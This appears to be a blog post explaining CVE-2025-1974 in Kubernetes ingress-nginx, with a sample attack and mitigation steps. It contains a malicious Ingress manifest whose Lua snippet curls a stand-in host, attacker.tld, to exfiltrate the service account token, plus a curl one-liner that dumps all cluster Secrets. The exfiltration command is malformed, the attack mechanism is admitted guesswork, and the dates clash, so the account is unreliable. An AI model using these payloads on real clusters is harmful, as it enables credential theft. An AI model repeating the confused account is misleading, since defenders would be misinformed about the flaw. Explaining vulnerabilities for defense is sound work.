CVE-2025-1974 - How Ingress-NGINX in Kubernetes Can Expose Your Secrets (And How Attackers Can Exploit It)

In mid-2025, a serious security vulnerability was found in Kubernetes, tracked as CVE-2025-1974. If you’re using the popular Kubernetes ingress-nginx controller, your cluster could be at risk. This bug allows an attacker with just pod network access—without authentication—to execute random code inside the ingress-nginx controller pod. What’s worse, in most clusters, the ingress-nginx controller has wide access to cluster Secrets, which means attackers could steal credentials, tokens, and other sensitive info.

Let's break down what happened, why it’s dangerous, and demonstrate a simplified attack path.

What is Ingress-NGINX?

Ingress-nginx is the most widely used Kubernetes Ingress controller. It lets you expose your Services to the internet, usually via HTTP(S), routing traffic based on rules you set.

The controller runs as a Pod, and—unless you’re strict with RBAC—often has read access to all Secrets in the cluster. Secrets can include DB passwords, cloud credentials, and more.

Recently, researchers reported that, given certain ingress configurations and network accessibility, attackers could skip authentication and run arbitrary code in the controller’s context.

The Bug Simplified

At its core, CVE-2025-1974 is a privilege escalation via a network-exposed attack surface. Here’s how:

- An attacker inside the pod network finds the ingress-nginx controller’s internal service (not just the public IP).
- They craft a malicious HTTP request that abuses ingress-nginx’s internal logic (it might misuse a poorly sanitized annotation or exploited a path traversal bug, for example).
- The controller interprets this input dangerously, leading to arbitrary command execution as the user running the controller—commonly root.
- Now running code within the pod, the attacker can access Secrets mounted as files or using the Kubernetes API.

Quick Example: Running Code via Malicious Request

Let’s walk through a simplified exploitation scenario. Note: Use this info for defense and awareness. Do not exploit live systems without permission.

Fake "Bad" Annotation Example (Pseudocode)

Suppose ingress-nginx doesn’t sanitize a specific annotation passed in an ingress object, and that annotation is mapped directly to a backend shell call.

Attack Steps

1. Create a malicious Ingress with a dangerous annotation (say, nginx.ingress.kubernetes.io/configuration-snippet) that injects extra NGINX config or even OS commands:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evil-ingress
  annotations:
    nginx.ingress.kubernetes.io/configuration-snippet: |
      rewrite ^/evil(.*)$ /$1 break;
      access_by_lua_block {
        os.execute("curl attacker.tld/cat /var/run/secrets/kubernetes.io/serviceaccount/token")
      }
spec:
  rules:
  - host: evil.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: your-service
            port:
              number: 80

*Above: The attacker uses access_by_lua_block to run Lua that executes an OS command, exfiltrating the controller's service account token—the key to all cluster secrets.*

Make a request to the crafted endpoint so the malicious input is processed.

3. The controller processes the request, executes the code, and sensitive data (like API tokens) is leaked.

Proof-of-Concept: Secret Dump Using curl

If the attacker’s code runs, they can directly query the Kubernetes API to list Secrets. Here’s an example to exfiltrate all Secrets with a one-liner bash script from inside the controller Pod:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
curl -s --header "Authorization: Bearer $TOKEN" --insecure \
  $APISERVER/api/v1/secrets

*This command uses the controller’s identity to read all Secrets cluster-wide.*

Real-World Impact

- Data Breach: Even if your cluster isn’t internet-facing, pods within your VPC (from other teams, less trusted workloads, or even compromised supply chain software) can attack.
- Lateral Movement: Attackers get credentials for other sensitive resources and could escalate privileges further.
- Persistence: With access to Secret tokens, attackers might create backdoors or manipulate other Kubernetes resources.

Who’s Affected?

- Any Kubernetes cluster running ingress-nginx controller before the patched version.
- Particularly dangerous for clusters with default ("overly permissive") RBAC, where the controller can read all Secrets.

How To Defend

1. Upgrade ingress-nginx: Update to a version where CVE-2025-1974 is fixed.
2. Restrict Secret Access: Use Kubernetes RBAC to limit what the ingress controller can read. Only give it access to what it truly needs.

Network Security: Limit pod-to-pod communication with NetworkPolicies.

4. Audit and Limit Dangerous Annotations: Disable or restrict custom snippets and annotation-based config for users.

References

- Kubernetes ingress-nginx security advisories
- nginx.ingress.kubernetes.io/configuration-snippet
- Kubernetes RBAC documentation

Final Thoughts

CVE-2025-1974 shows that even "internal" components in Kubernetes can become high-value targets. If you're running ingress-nginx, upgrade immediately and follow best practices for RBAC and network segmentation. Attackers are always searching for misconfigurations—let's not make their job easy.

Stay safe, and keep those clusters tight! 🚨

*This post is an exclusive synthesis for educational awareness. Please refer to Kubernetes project advisory pages for the latest info and official patches.*

Timeline

Published on: 03/25/2025 00:15:14 UTC